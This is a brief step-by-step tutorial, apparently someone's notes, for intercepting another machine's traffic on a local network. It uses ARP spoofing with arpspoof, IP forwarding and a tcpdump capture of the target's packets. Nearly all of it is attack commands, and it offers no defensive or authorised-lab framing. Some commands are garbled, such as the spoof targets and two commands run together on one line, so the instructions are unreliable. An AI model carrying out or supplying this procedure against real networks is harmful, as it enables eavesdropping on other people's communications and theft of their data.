Objective:
To see transferred packets throughout the network
Step:
- open command line and type
echo 1 > /proc/sys/net/ipv4/ip_forward
next find out your ip using
ifconfig
after you found your ip, find targeted ip and run
arpspoof -t your.ip.address target.ip.address
in this case, my ip is 172.20.10.1 and the target ip is 172.20.10.12
- run first step in new tab and switch your ip and target ip such as
echo 1 > /proc/sys/net/ipv4/ip_forward arpspoof -t target.ip.address your.ip.address
- run in new tab command to eavesdrop packet sent to target
tcpdump -vv src 172.20.10.12 -w foldername/fileoutputname.pcap
it will keep listening to the network for a while, to exit press ctrl+c on your keyboard
- the output of this will be put on your specified foldername/fileoutputname.pcap, you can open the file using Wireshark to see what happened when you listened to the network